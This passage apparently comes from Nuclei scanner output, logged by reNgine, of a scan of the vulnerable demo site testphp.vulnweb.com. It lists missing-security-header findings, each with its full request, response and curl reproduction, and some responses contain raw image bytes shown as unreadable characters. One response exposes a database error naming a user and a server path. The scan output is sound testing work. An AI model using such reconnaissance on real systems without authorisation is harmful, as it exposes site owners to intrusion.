10\\ufffd\\ufffd\\u0012Kȶ\\ufffdА\\ufffd\\ufffdC\\u0001Z\\u001a\\ufffdB\\u0000\\ufffd\\u0006Ҵ1I\\n\\u0004\\ufffd\\u0000X\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\ufffd\\u001com\\ufffd\\u0004\\ufffd,\\ufffd7\\u000e\\ufffd}\\ufffd\\\\1\\ufffd,\\ufffd\\u001f\\u0017\\ufffd\\ufffd#\\ufffdwG\\ufffdϫ\\ufffd\\u0016\\ufffd\\ufffd\\ufffddPf\\ufffd\\u003c\\u0013\\ufffdK\\ufffd\\ufffdG\\ufffd4j\\ufffd\\ufffd\\u001c\\ufffdi\\ufffd$\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\ufffdj\\ufffd4C\\u000b\\ufffd\\ufffd\\ufffdg\\ufffd8\\ufffd`\\ufffd.\\ufffdΜy)\\ufffdN\\ufffd\\ufffd?\\ufffd\\ufffdj\\ufffd\\ufffd\\u001a\\ufffd*\\ufffdw\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd),\\u0012\\ufffd5b\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffdg%\\ufffd\\ufffd[7e\\ufffdb\\ufffd\\u001a\\ufffd\\u0000/\\ufffd$\\ufffdfiƎ֛3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdХ\\ufffd5b\\ufffdޥ\\ufffd@%Ţ\\u0008\\u0019v\\u0000\\u0000\\u0000\\u0014E\\u0012\\u0000M\\ufffd(\\ufffd\\u0018\\u0008\\ufffdw1h\\ufffd\\ufffd(\\ufffd\\ufffd\\ufffd\\u001e\\u001a7\\ufffd\\ufffdC\\u001c\\ufffd\\ufffd\\ufffd_\\ufffd\\u000c{,\\ufffd\\ufffdَ[]\\ufffd\\ufffdkp\\ufffd\\ufffdp}\\u001d?ĹI\\ufffd\\ufffd'\\ufffd\\u0026\\ufffdjq\\ufffd\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffd\\ufffdWO\\ufffd\\ufffd\\ufffd\\ufffdkV\\ufffd\\ufffd\\ufffd}\\u001bq\\ufffd|\\ufffdc]\\ufffdq5\\u0018\\ufffd\\ufffdp\\u0013\\ufffdJ\\ufffd\\u00003\\ufffd\\ufffd]Fhe\\ufffd\\u0018\\ufffd\\ufffdK\\ufffd4\\ufffd%r}\\ufffd\\ufffdW\\ufffd\\ufffdà\\ufffd\\ufffdd\\ufffdh\\ufffd}\\ufffd\\ufffd-\\ufffd\\\\\\ufffd\\ufffd\\u001c\\ufffdE\\ufffd\\ufffd+B\\ufffd+^\\ufffd4j\\ufffd\\ufffd\\u0004\\u0010\\ufffd}\\ufffd\\u0004\\u000cN\\ufffdqb\\ufffd\\u0000Qe?e`6\\ufffd\\u001b~Ȣې\\ufffd6߲v\\ufffd\\ufffd܄\\u0026\\ufffd\\ufffd\\u0014C\\ufffd\\ufffdJ\\ufffdx\\ufffd\\n\\u003enjlԑ\\ufffd\\ufffd5CEY\\ufffd3\\ufffd\\ufffdj=\\ufffd\\nʱ\\ufffd\\ufffdեj\\ufffdб\\ufffd\\u0000N\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffdp\\ufffd\\ufffd\\ufffdk3\\ufffd\\ufffdҾ\\ufffd9\\ufffd\\ufffd\\ufffd}3t\\ufffd\\ufffd\\ufffdψ\\ufffd2J4\\ufffdN\\rvt\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u003e\\ufffdq\\ufffd%\\ufffd\\ufffd\\t\\ufffd\\ufffd\\u001fB\\ufffd\\ufffde\\ufffd\\u001bJ\\ufffd\\u001e\\ufffdQM\\\"(\\ufffd»^,]\\ufffde\\\\FG2k\\ufffdWAC\\ufffd\\r\\ufffd\\ufffd.\\ufffdbPQf\\ufffd\\ufffd\\ufffdt[^\\tP\\ufffd\\ufffdΣ\\ufffd(\\ufffd\\ufffd\\ufffd\\u00126\\ufffd6\\ufffdYlJ\\u0026\\ufffd\\ufffd\\ufffdI\\u0013D\\u003c\\ufffd\\ufffd\\ufffdd\\u0017 \\u0006\\ufffd\\ufffdp2\\ufffd\\u000e\\ufffd\\ufffdm%\\u000e6\\ufffd\\ufffd\\ufffduc\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd}\\ufffd\\ufffd\\u0000\\u001dl*⏝y\\ufffdJ\\u0019\\ufffdK\\ufffdNn\\ufffdN\\u0012x\\ufffd䋤rr%`\\u0006-W\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd\\ufffdEd(\\ufffd\\u0003!\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdP\\ufffd8\\ufffd\\ufffdk\\ufffd\\ufffd\\u0005)\\ufffd?,\\u0000+\\ufffd\\ufffd\\ufffd;5\\u0012\\ufffd\\u000c2\\ufffd\\ufffd\\ufffd+\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\u0000e\\ufffd2\\ufffd\\t7\\ufffd6-\\\"v\\ufffd\\u0001f\\ufffdd\\ufffd\\u0026ͺXA\\ufffd\\ufffd\\ufffdSh\\u0000~\\ufffd\\\\\\ufffdW\\ufffd\\ufffd\\ufffd%O\\ufffd\\ufffdr\\ufffd\\ufffdc\\u0014\\ufffd\\u0004\\u003eΌ\\u001b\\ufffdCHe\\u0014\\u0000\\u0008\\ufffd\\ufffd\\u0007\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:14.583155239Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586' 'http://testphp.vulnweb.com/pictures/2.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/login\",\"path\":\"/login\",\"matched-at\":\"http://testphp.vulnweb.com/login\",\"request\":\"GET /login HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:40 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:14.759638211Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/login'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/hpp\",\"path\":\"/hpp\",\"matched-at\":\"http://testphp.vulnweb.com/hpp/\",\"request\":\"GET /hpp HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:40 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003ctitle\\u003eHTTP Parameter Pollution Example\\u003c/title\\u003e\\r\\n\\r\\n\\u003ca href=\\\"?pp=12\\\"\\u003echeck\\u003c/a\\u003e\\u003cbr/\\u003e\\r\\n\\r\\n\\u003chr\\u003e\\r\\n\\u003ca href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'\\u003eOriginal article\\u003c/a\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:14.759623758Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50' 'http://testphp.vulnweb.com/hpp'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/bxss/adminPan3l\",\"path\":\"/bxss/adminPan3l\",\"matched-at\":\"http://testphp.vulnweb.com/bxss/adminPan3l/\",\"request\":\"GET /bxss/adminPan3l HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:35 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003chead\\u003e\\n \\u003ctitle\\u003eAdministrative panel\\u003c/title\\u003e \\n \\u003clink rel=\\\"stylesheet\\\" type=\\\"text/css\\\" href=\\\"style.css\\\"\\u003e \\n\\u003c/head\\u003e\\n \\n\\u003cbody\\u003e\\n\\u003cp\\u003e \\n \\u003ccenter\\u003e\\n \\u003cimg src=\\\"http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\n \\u003ch2\\u003eAdministrative Panel\\u003c/h2\\u003e\\n \\u003c/center\\u003e\\n\\u003c/p\\u003e \\n \\n\\u003cb\\u003eLast 100 visitors on this site\\u003c/b\\u003e\\n\\n\\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /hj/var/www/bxss/database_connect.php on line 2\\n\\nWarning: mysql_connect(): Access denied for user 'bxss'@'localhost' (using password: YES) in /hj/var/www/bxss/database_connect.php on line 2\\nWebsite is out of order. Please visit back later. Thank you for understanding.\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:14.759683026Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0' 'http://testphp.vulnweb.com/bxss/adminPan3l'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/1.jpg.tn\",\"path\":\"/pictures/1.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/1.jpg.tn\",\"request\":\"GET /pictures/1.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4355\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-1103\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001b\\u0000\\u0000\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0001\\u0005\\u0003\\u0004\\u0007\\u0002\\ufffd\\ufffd\\u00004\\u0010\\u0000\\u0002\\u0001\\u0003\\u0004\\u0001\\u0003\\u0003\\u0003\\u0003\\u0004\\u0001\\u0005\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!1A\\u0006\\u0013Q\\\"a\\ufffd\\u0014q\\ufffd2\\ufffd\\ufffd#BR\\ufffd\\ufffd\\u0016b\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0019\\u0001\\u0000\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0005\\ufffd\\ufffd\\u0000)\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0002\\u0005\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004!1\\u0012A\\u0005\\u0013Q\\ufffd\\ufffd2aq\\ufffd\\\"3\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\u003e\\ufffd\\ufffdn?\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8ԝB\\ufffdw\\u0018Va\\ufffd9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd.\\ufffdH\\ufffdn\\t \\ufffd\\ufffdr2s\\ufffd\\u0006\\ufffd\\ufffdP\\u0003z\\ufffd\\ufffd8\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0006$}#\\ufffd\\ufffd\\ufffd\\ufffdW\\t\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffd\\ufffdc ʸʮ\\u003c\\ufffd\\ufffd\\ufffd\\ufffd׹Er\\ufffd\\n/\\ufffdI\\ufffd\\ufffd\\ufffdj\\ufffd\\u0026\\ufffd\\ufffd\\ufffddY\\u0019@\\ufffdW\\ufffd\\ufffd#\\ufffdr\\u003e\\ufffdϚ\\ufffd\\ufffdlN^}\\ufffd\\u0015\\ufffd#3(|g\\ufffdp0rpO\\ufffd\\ufffdf\\ufffd\\ufffd}%%\\ufffd\\u0006kIE\\ufffdf\\ufffd\\u0010\\ufffd\\u0003\\ufffd\\ufffd\\u0007\\u001f\\ufffd\\ufffd\\u0006\\ufffdzf\\ufffd\\ufffd^\\ufffdC%Ƕ\\ufffd\\u0019\\u00140;C\\u001d\\ufffd\\u0018\\ufffd?\\ufffd\\ufffd\\ufffdz\\ufffd\\\\\\\\[\\ufffd\\ufffd\\u00025\\ufffdy.\\\\\\ufffd\\u00169۟\\ufffd8\\u001fڮ\\ufffd?\\ufffd\\u0019L3\\\\\\ufffd\\ufffd\\ufffd\\u0019#\\u00110\\ufffd\\\\x\\ufffd\\ufffd8\\ufffd#\\ufffd\\u001b\\ufffdZ\\u0015Ʃ|\\ufffd\\u001e5 夑\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdդ\\ufffd=\\u003e\\ufffd\\u001bI\\ufffdi\\ufffd;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n2\\u0006\\u0007۳\\ufffdO^(\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffdP\\ufffd.\\ufffd\\ufffd_fEUR\\u0002}9\\ufffd\\ufffdr6\\ufffd\\ufffd\\ufffd\\ufffd\\u003ej\\ufffdg\\ufffd$g\\ufffd\\u0017$\\ufffd\\u000e\\ufffd{\\ufffd\\ufffd[\\ufffdL\\ufffd\\ufffd\\ufffd9\\ufffd,sXi\\u0026\\u0014y\\ufffd\\ufffd\\ufffdT\\ufffdb*E\\u0014VH\\ufffd\\ufffd퍌\\ufffdI,\\ufffd\\ufffd\\ufffdE\\ufffd\\ufffd0\\u0007\\u0007\\ufffd\\ufffd\\ufffd?\\ufffd\\u0015\\ufffd;\\ufffd\\ufffd\\u0017]\\ufffdJ\\ufffdX\\ufffd\\ufffdFd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$`c\\ufffd\\ufffd2\\ufffd0գ\\ufffd7\\u0016\\ufffdnח\\\"ј;2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdp;'9\\u0018\\ufffdz\\ufffd\\u0014\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd[)\\ufffd3Z\\ufffdorEY\\u000c\\ufffd\\u001e|\\u0011\\ufffdq\\ufffd|\\u001e\\ufffd\\ufffda\\u001e\\ufffdu$-\\u000bJ\\ufffd\\u001f;\\ufffd\\ufffd\\u0000p\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffdT\\ufffd\\ufffd\\ufffd\\\"\\ufffdM\\ufffd\\ufffd1\\ufffd06\\ufffdۉ\\u0001O\\u0000\\ufffdg\\u001c\\ufffd\\ufffd\\ufffdN\\ufffd\\u003e\\ufffd\\ufffd\\ufffd\\ufffd,\\ufffd]\\ufffd%ܰ\\ufffd\\ufffdH\\u0010s\\ufffdO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015S\\ufffdz\\ufffdi\\ufffd%\\ufffd@\\ufffd\\ufffd@G\\ufffd\\u0007`,@#'\\ufffdC\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffdl\\u0004\\ufffdX\\ufffdX\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd.\\u0014\\ufffdA\\ufffdU\\ufffd\\\\6i\\nٱ\\ufffd\\ufffd-~\\\"2ƂDP\\ufffd\\ufffd`\\ufffd\\u0000\\u0003\\ufffd\\u0001\\ufffd\\ufffdV׿\\u0015\\u0014$\\ufffdm\\ufffd\\ufffdIsr\\ufffd0Uf\\ufffd\\ufffd\\u0014\\u0003\\ufffd\\ufffd.\\ufffdsq\\ufffd\\ufffd\\ufffdg\\ufffd\\ufffd\\ufffd]\\ufffd8\\u001fj\\ufffd\\u0006\\ufffd\\ufffdb\\ufffd/,\\ufffd\\u001e\\ufffd\\ufffd]B\\u0015\\\"\\ufffd\\ufffd\\nS\\ufffdp\\ufffd\\ufffd\\u003e3\\ufffd\\u0000\\\\S\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd6\\ufffdRI[\\u000258\\ufffd\\ufffd\\u0000\\u000b\\ufffd;\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003cbDxAiJ\\ufffd\\u0026\\ufffdn8\\u000b\\ufffd\\u0007\\ufffd\\ufffd\\ufffd' f\\ufffd\\ufffdC\\ufffd\\ufffd\\ufffd\\ufffd,jR\\u0018\\ufffd\\u0015Oǎ\\u0007\\u0003\\ufffd:\\ufffd\\ufffd\\ufffd+\\u001fO\\ufffdb\\ufffd\\ufffd\\u0017z\\ufffd\\ufffdF\\u0014\\ufffd\\u000bI\\u0003,b1\\ufffdS#$\\u00022\\t\\ufffd3\\ufffdq\\ufffd\\ufffd ^\\u0016$\\ufffd'\\ufffd\\ufffd\\u001e\\ufffdԭ\\ufffd-೾\\ufffdi\\ufffd\\ufffd\\ufffd*\\ufffd\\ufffd\\u0013g\\u00039##\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd?L\\ufffdH\\ufffd\\u0000D\\ufffd\\ufffdO\\ufffdIw\\ufffd\\u0000S}D\\ufffd\\ufffd\\u0000\\r\\ufffdpz\\ufffd\\ufffd\\u0010\\ufffdA\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\u001a\\ufffda\\ufffdto\\ufffd^\\ufffd\\ufffd\\ufffdv\\ufffd~\\ufffd1\\ufffd\\ufffd\\u0000\\ufffd\\u003c\\ufffd\\u000f\\ufffdU\\\\Zl\\ufffdh\\ufffd%\\ufffd\\u001e񊫊o\\u00004\\ufffd暮\\ufffdKD\\ufffd\\ufffdS\\ufffd\\ufffda\\ufffd,\\ufffd\\\"\\ufffdr\\\\\\u0004\\u001f\\ufffdT\\u001f\\u003c\\u000c\\ufffd\\ufffd\\ufffd\\u001aV\\ufffdK\\ufffd\\ufffd'\\ufffd*qEn\\ufffd\\u0000\\ufffd\\u0014b\\ufffd\\ufffd(\\ufffdՎ\\u000c\\ufffd\\u0018\\ufffd3\\ufffdg\\u0015Ҵ\\ufffd\\u001d,\\\\$\\ufffdE\\ufffd\\ufffd\\ufffd}\\ufffd\\ufffd\\u00021\\ufffdO\\u001d\\ufffdۏ\\ufffd\\ufffd\\ufffd\\u0004]'G\\ufffd\\ufffd\\ufffd\\ufffdx!wH\\ufffd\\u0007j\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\u0004wz\\\\x\\u0018B\\ufffd\\ufffd\\ufffd\\u0014dy\\ufffd\\ufffdG\\ufffd\\ufffd-\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\u003eL\\ufffdMR\\ufffd!\\ufffd\\ufffd\\ufffdKh\\ufffd$\\u0026]\\ufffdI\\ufffd\\u0002\\n\\ufffds\\ufffd\\ufffd?ǐ+\\ufffdkz5\\ufffd\\ufffd\\ufffd\\ufffd=\\ufffdR\\ufffd\\u0007!b\\ufffdNJ\\ufffd\\u001b\\ufffd\\u001dq\\ufffds\\ufffd8\\u00184\\ufffdt\\ufffdm\\ufffd\\ufffd\\ufffd\\u00067\\ufffdwb\\ufffd\\t`\\ufffd\\ufffd\\ufffd{\\u0001\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd\\ufffd\\u001e\\ufffd\\ufffd\\u000f\\ufffd9\\ufffd,c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd$\\u0003\\ufffd\\u001dW.\\ufffdR\\ufffd\\nO+\\ufffd\\ufffd4\\ufffd\\u0017\\u0008\\ufffd\\ufffd\\u0018\\ufffdr.\\rx\\ufffd\\ufffd\\ufffd!\\u0014\\ufffd\\u0000;=U\\ufffdiw6:\\ufffd\\ufffdȻ\\ufffd\\u0019L{\\ufffdK#\\u0010q\\ufffd\\ufffd`\\ufffd:6\\u000eFA\\u001eE8zwVKM6In\\ufffdnj2\\ufffd]Ý\\ufffd\\ufffd\\ufffdDn8\\u0000\\ufffd\\u003eOc5\\u0018K`\\ufffd:\\ufffd\\ufffdv\\ufffd|Q\\ufffd^\\u0018/\\u00034\\ufffd$\\n\\u0000\\ufffd\\u0007\\u0005\\ufffd\\u000c\\u001bpny\\ufffd\\u003c\\u001a痷r\\\\\\\\\\u003c\\ufffd9wc\\ufffd\\ufffd\\u0026\\ufffdk[\\ufffd\\ufffd\\u0006Q\\\"\\ufffdޥ\\\\0\\ufffd\\ufffdu\\ufffd\\ufffd\\u001e\\u0008\\ufffdWf\\ufffd\\u001cD\\u0005\\ufffd\\ufffd\\ufffdOep\\ufffd[?\\ufffd(\\ufffd\\ufffd\\ufffd~\\ufffd\\ufffd\\ufffd\\ufffdyđ\\ufffdwl\\ufffdVf6\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd?\\ufffds\\ufffd\\ufffd\\ufffd)\\u0017LA-\\ufffd1\\ufffd\\u003c\\ufffd\\ufffd\\u0026\\ufffd\\ufffd\\u0019\\ufffd\\ufffd\\u0001\\ufffd\\ufffd8ìZ\\ufffd@\\ufffd~\\ufffd\\u000c\\ufffd!̲\\ufffdk\\ufffd\\ufffd\\ufffd/dp{㓎\\ufffd\\t\\ufffd\\u0000%\\ufffd\\ufffda\\ufffd\\u001d6\\u001d2\\ufffd\\ufffd\\ufffd0̒\\ufffd\\ufffdG\\u0004\\ufffd